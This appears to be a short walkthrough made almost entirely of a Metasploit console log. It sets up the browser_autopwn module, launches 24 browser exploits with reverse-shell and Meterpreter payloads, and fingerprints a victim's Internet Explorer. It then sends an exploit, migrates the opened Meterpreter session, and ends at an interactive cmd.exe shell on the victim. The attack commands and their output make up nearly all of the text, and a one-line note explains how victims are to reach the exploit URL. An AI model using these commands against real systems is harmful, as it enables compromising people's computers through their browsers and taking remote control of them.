Once you run exploit a client will need to browse to the url http://192.168.1.2:80/1
This will not bypass AV
use auxiliary/server/browser_autopwn
set lhost 192.168.1.2
set srvport 8080
set uripath /1
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-02-23 15:01:37 +0100
msf auxiliary(browser_autopwn) > [*] Done in 1.510720899 seconds
[*] Starting exploit modules on host 192.168.1.2…
[*] —
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/CSliqBLbAetJg
[*] Local IP: http://192.168.1.2:80/CSliqBLbAetJg
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/jUdrG
[*] Local IP: http://192.168.1.2:80/jUdrG
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/zOSzOCpOGIe
[*] Local IP: http://192.168.1.2:80/zOSzOCpOGIe
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/jzewIknlw
[*] Local IP: http://192.168.1.2:80/jzewIknlw
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/XOZQPjQ
[*] Local IP: http://192.168.1.2:80/XOZQPjQ
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/MXnujRr
[*] Local IP: http://192.168.1.2:80/MXnujRr
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/ywaepj
[*] Local IP: http://192.168.1.2:80/ywaepj
[*] Server started.
[*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/pAAqdtCSCDS
[*] Local IP: http://192.168.1.2:80/pAAqdtCSCDS
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/haCqxLlurtEq
[*] Local IP: http://192.168.1.2:80/haCqxLlurtEq
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/hyCntoHSSHiS
[*] Local IP: http://192.168.1.2:80/hyCntoHSSHiS
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/Muoazv
[*] Local IP: http://192.168.1.2:80/Muoazv
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/nfvpMMmFMePdG
[*] Local IP: http://192.168.1.2:80/nfvpMMmFMePdG
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/bWrpEnXiDwN
[*] Local IP: http://192.168.1.2:80/bWrpEnXiDwN
[*] Server started.
[*] Using URL: http://0.0.0.0:80/hkAcMF
[*] Local IP: http://192.168.1.2:80/hkAcMF
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/nHoGVKWjGZ
[*] Local IP: http://192.168.1.2:80/nHoGVKWjGZ
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/fHJEEPcrAE
[*] Local IP: http://192.168.1.2:80/fHJEEPcrAE
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gqKmIgrabr
[*] Local IP: http://192.168.1.2:80/gqKmIgrabr
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/PXcSdO
[*] Local IP: http://192.168.1.2:80/PXcSdO
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/QbyGUCn
[*] Local IP: http://192.168.1.2:80/QbyGUCn
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MnaySlKoxhHWd
[*] Local IP: http://192.168.1.2:80/MnaySlKoxhHWd
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oJvBxKmhgmWkQ
[*] Local IP: http://192.168.1.2:80/oJvBxKmhgmWkQ
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KXQG
[*] Local IP: http://192.168.1.2:80/KXQG
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VMexpRuenG
[*] Local IP: http://192.168.1.2:80/VMexpRuenG
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/TDbswvly
[*] Local IP: http://192.168.1.2:80/TDbswvly
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.1.2:3333
[*] Starting the payload handler…
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.1.2:6666
[*] Started reverse handler on 192.168.1.2:7777
[*] Starting the payload handler…
[*] Starting the payload handler…
[*] — Done, found 24 exploit modules
[*] Using URL: http://0.0.0.0:80/1
[*] Local IP: http://192.168.1.2:80/1
[*] Server started.
[*] 192.168.20.42 Browser Autopwn request ‘/1’
[*] 192.168.20.42 Browser Autopwn request ‘/1?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AzOmVuLWdiOng4NjpNU0lFOjcuMDo%3d’
[*] 192.168.20.42 JavaScript Report: Microsoft Windows:XP:SP3:en-gb:x86:MSIE:7.0:
[*] 192.168.20.42 Reporting: {:os_name=>”Microsoft Windows”, : os_flavor=>”XP”, : os_sp=>”SP3″, : os_lang=>”jp-jp”, :arch=>”x86″}
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.20.42:1063…
[-] Exception handling request: Connection reset by peer
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.20.42:1064…
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.20.42:1065 (target: IE 6 SP0-SP2 (onclick))…
[*] Sending stage (752128 bytes) to 192.168.20.42
[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.20.42:1066) at 2012-04-23 15:02:41 +0100
[*] Session ID 1 (192.168.1.2:3333 -> 192.168.20.42:1066) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: IEXPLORE.EXE (3928)
[*] Spawning notepad.exe process to migrate to
l[+] Migrating to 644
[+] Successfully migrated to process
Interrupt: use the ‘exit’ command to quit
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > execute -f cmd.exe -c
Process 1096 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…
Microsoft Windows XP [Version 4.1.2061]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\11\Desktop>